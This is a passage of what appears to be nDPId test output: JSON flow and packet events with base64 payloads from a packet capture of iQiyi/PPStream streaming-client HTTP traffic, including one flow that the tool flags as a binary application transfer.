aV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"} +01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +02166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\/+YwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozOCBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY4MDQ1Mw0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDINClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hlUfxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"} +02175{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsLG1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0cjf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"} +00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7560000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="} +00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} +02158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLXL+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Ktlu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW